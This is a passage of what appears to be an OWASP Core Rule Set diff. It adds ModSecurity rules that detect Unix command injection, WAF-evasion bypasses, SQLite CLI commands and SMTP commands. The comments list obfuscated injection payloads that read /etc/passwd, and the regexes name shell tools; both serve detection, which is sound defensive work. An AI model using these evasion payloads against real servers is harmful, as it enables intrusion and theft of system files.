tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# This is a stricter sibling of rule 932130. +# +# It applies the same regular expression to the +# User-Agent and Referer HTTP headers. +# +# Unlike the sibling rule, this rule runs in phase 1. 
+# +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?:\$(?:\((?:\(.*\)|.*)\)|\{.*})|[<>]\(.*\)|\[!?.+\])" \ + "id:932131,\ + phase:1,\ + block,\ + capture,\ + t:none,t:cmdLine,\ + msg:'Remote Command Execution: Unix Shell Expression Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Rule 932200 ]=- +# +# Block RCE Bypass using different techniques: +# - uninitialized variables (https://www.secjuice.com/web-application-firewall-waf-evasion/) +# - string concatenations (https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) +# - globbing patterns (https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) +# +# Examples: +# - foo;cat$u+/etc$u/passwd +# - bar;cd+/etc;/bin$u/ca*+passwd +# - foo;ca\t+/et\c/pa\s\swd +# - foo;c'at'+/etc/pa's'swd +# - foo;c$@at+/et$@c/pas$@swd +# - foo;c$!at+/et$!c/pas$!swd +# - foo;c$*at+/et$*c/pas$*swd +# - foo;c$?at+/et$?c/pas$?swd +# - foo;c$-at+/et$-c/pas$-swd +# - foo;c$_at+/et$_c/pas$_swd +# - foo;c$$at+/et$$c/pas$$swd +# +# Regex notes: https://regex101.com/r/V6wrCO/1 +# +# Regular expression generated from regex-assembly/932200.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932200 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx ['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]" \ + "id:932200,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,t:urlDecodeUni,\ + msg:'RCE Bypass Technique',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932200_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.932200_matched_var_name=%{matched_var_name}',\ + chain" + SecRule MATCHED_VAR "@rx /" \ + "t:none,t:urlDecodeUni,\ + chain" + SecRule MATCHED_VAR "@rx \s" \ + "t:none,t:urlDecodeUni,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Rule 932205 ]=- +# +# Sibling of 932200 targeting the Referer header. URLs cause false positives in rule 932200 +# and must be handled with additional checks. +# +# Regular expression generated from regex-assembly/932205.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932205 +# +SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]+\.[^;\?]+[;\?](.*(['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]))" \ + "id:932205,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,t:urlDecodeUni,\ + msg:'RCE Bypass Technique',\ + logdata:'Matched Data: %{TX.2} found within %{TX.932205_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.932205_matched_var_name=%{matched_var_name}',\ + chain" + SecRule TX:1 "@rx /" \ + "t:none,t:urlDecodeUni,\ + chain" + SecRule TX:1 "@rx \s" \ + "t:none,t:urlDecodeUni,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Rule 932206 ]=- +# +# Sibling of 932200 targeting the Referer header. URLs cause false positives in rule 932200 +# and must be handled with additional checks. +# +# Regular expression generated from regex-assembly/932206.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932206 +# +SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{])" \ + "id:932206,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,t:urlDecodeUni,\ + msg:'RCE Bypass Technique',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932206_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.932206_matched_var_name=%{matched_var_name}',\ + chain" + SecRule MATCHED_VAR "@rx /" \ + "t:none,t:urlDecodeUni,\ + chain" + SecRule MATCHED_VAR "@rx \s" \ + "t:none,t:urlDecodeUni,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# Regular expression generated from regex-assembly/932220.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932220 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\v]*|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|G[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?E[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?T|a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ks])|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[8-9][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?9|[au][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*
)?\x5c?h)|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[gr])|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[bdx]|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|q[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[c-dgi]|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[chr][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|o|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b)|j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|q)|k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d)?|[nps]|u[\"'\)\[-\x5c]*(?:(?:(
?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a|z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?4)?)|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|v)|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[at][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?g|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cp]|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)?|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{
]*)?\x5c?[dt]|[g-hu]|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cr]|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l|[co][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ex]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c)|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|l)|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|c)|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|z)|y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h))" \ + "id:932220,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection with pipe',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + 
tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# -=[ Rule 932240 ]=- +# +# Generic RCE Bypass blocking using different techniques: see https://github.com/coreruleset/coreruleset/issues/2632 +# +# This rule complements rule 932230 with generic evasion detection. +# Anything that uses a well-known evasion technique should be blocked at this level. +# The chained rule will exclude false positives due to german thousands separators (e.g., 10'000). +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from 
regex-assembly/932240.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932240 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?i)[\-0-9_a-z]+(?:[\"'\[-\]]+|\$+[!#\*\-0-9\?-@\x5c_a-\{]+|``|[\$<>]\(\))[\s\v]*[\-0-9_a-z]+" \ + "id:932240,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection evasion attempt detected',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932240_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.932240_matched_var_name=%{matched_var_name}',\ + chain" + SecRule MATCHED_VAR "!@rx [0-9]\s*\'\s*[0-9]" \ + "t:none,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + + +# [ Sqlite System Command Execution ] +# +# This rule prevents execution of SQLite CLI commands like .system and .shell +# +# You can find a vulnerable script and a sample payload here: +# https://github.com/qxxxb/ctf/tree/master/2021/zer0pts_ctf/baby_sqli +# +# List of sqlite3 CLI commands: +# https://sqlite.org/cli.html +# +# Regular expression generated from regex-assembly/932210.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932210 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ;[\s\v]*\.[\s\v]*[\"']?(?:a(?:rchive|uth)|b(?:a(?:ckup|il)|inary)|c(?:d|h(?:anges|eck)|lone|onnection)|d(?:atabases|b(?:config|info)|ump)|e(?:cho|qp|x(?:cel|it|p(?:ert|lain)))|f(?:ilectrl|ullschema)|he(?:aders|lp)|i(?:mpo(?:rt|ster)|ndexes|otrace)|l(?:i(?:mi|n)t|o(?:ad|g))|(?:mod|n(?:onc|ullvalu)|unmodul)e|o(?:nce|pen|utput)|p(?:arameter|r(?:int|o(?:gress|mpt)))|quit|re(?:ad|cover|store)|s(?:ave|c(?:anstats|hema)|e(?:lftest|parator|ssion)|h(?:a3sum|ell|ow)?|tats|ystem)|t(?:ables|estc(?:ase|trl)|ime(?:out|r)|race)|vfs(?:info|list|name)|width)" \ + "id:932210,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,t:compressWhitespace,\ + msg:'Remote Command Execution: SQLite System Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# -=[ SMTP/IMAP/POP3 Command Execution ]=- +# +# Rationale +# ========= +# +# The rules for email command execution are based on the RFCs for each protocol. +# Some of the commands have optional and/or additional parameters, so we tried to be +# precise to avoid as many FP in PL2 rules. +# For those commands that resemble common English words, and may pose a higher risk of false positives, +# they have been split off to a sibling rule in PL3. 
+ +# =[ SMTP Command Execution ]= +# +# This rule prevents execution of SMTP related system commands. +# +# List of SMTP commands: from rfc 5321 (https://www.rfc-editor.org/rfc/rfc5321) +# +# Regular expression generated from regex-assembly/932300.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932300 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:(?i:E)(?:HLO [\--\.A-Za-z\x17f\x212a]{1,255}|XPN .{1,64})|HELO [\--\.A-Za-z\x17f\x212a]{1,255}|MAIL FROM:<.{1,64}(?i:@).{1,255}(?i:>)|(?i:R)(?:CPT TO:(?:(?i:<).{1,64}(?i:@).{1,255}(?i:>)|(?i: ))?(?i:<).{1,64}(?i:>)|SET\b)|VRFY .{1,64}(?: <.{1,64}(?i:@).{1,255}(?i:>)|(?i:@).{1,255})|AUTH [\-0-9A-Z_a-z\x17f\x212a]{1,20}(?i: )(?:(?:[\+/-9A-Z_a-z\x17f\x212a]{4})*(?:[\+/-9A-Z_a-z\x17f\x212a]{2}(?i:=)|[\+/-9A-Z_a-z\x17f\x212a]{3}))?(?i:=)|STARTTLS\b|NOOP\b(?:(?i: ).{1,255})?)" \ + "id:932300,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: SMTP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# =[ IMAP Command Execution ]= +# +# This rule prevents execution of IMAP4 related system commands. +# +# List of IMAP4 commands: from rfc 3501 (https://datatracker.ietf.org/doc/html/rfc3501#section-9) +# +# Note: Mailbox International Naming Convention uses UTF-7, so it was left out explicitly. +# +# Regular expression generated from regex-assembly/932310.ra. 
